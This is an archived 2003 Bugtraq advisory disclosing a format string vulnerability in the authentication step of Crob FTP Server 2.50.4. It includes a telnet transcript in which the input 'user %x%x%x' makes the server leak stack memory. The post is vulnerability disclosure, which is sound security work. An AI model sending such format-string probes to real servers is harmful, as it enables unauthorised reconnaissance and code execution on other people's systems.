Format String Vulnerability in Crob Ftp Server

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Format String Vulnerability in Crob Ftp Server
From: Luca Ercoli <luca.ercoli@xxxxxxxxx>
Date: 2 Jun 2003 16:55:10 -0000
Delivered-to: zerbey@localhost.horry.org
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
Delivery-date: Mon, 02 Jun 2003 18:10:42 +0100
Envelope-to: zerbey@wibble.co.uk
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm


Package:        Crob Ftp Server

Auth:		Crob Software Studio (www.crob.net/studio/ftpserver/)

Version: 	2.50.4 Build 228

Vulnerability:  Format String

Risk: 	        High





Vulnerability

Description:



A format string flaw in the authentication process allows remote attackers 

without valid user/pass to execute arbitrary code.





C:\>telnet 192.168.0.1 21



220- Crob FTP Server V2.50.4

220  Welcome to Crob FTP Server



user %x%x%x



331 Password required for 0d1250b70















Luca Ercoli luca.ercoli[at]inwind.it

Prev by Date: [Windows XP] ntdll.dll Buffer Overflow Vulnerability - Yet Another MS03-007
Next by Date: Some Network Drivers May Leak Data on IRIX
Previous by thread: [Windows XP] ntdll.dll Buffer Overflow Vulnerability - Yet Another MS03-007
Next by thread: Some Network Drivers May Leak Data on IRIX
Index(es):
- Date
- Thread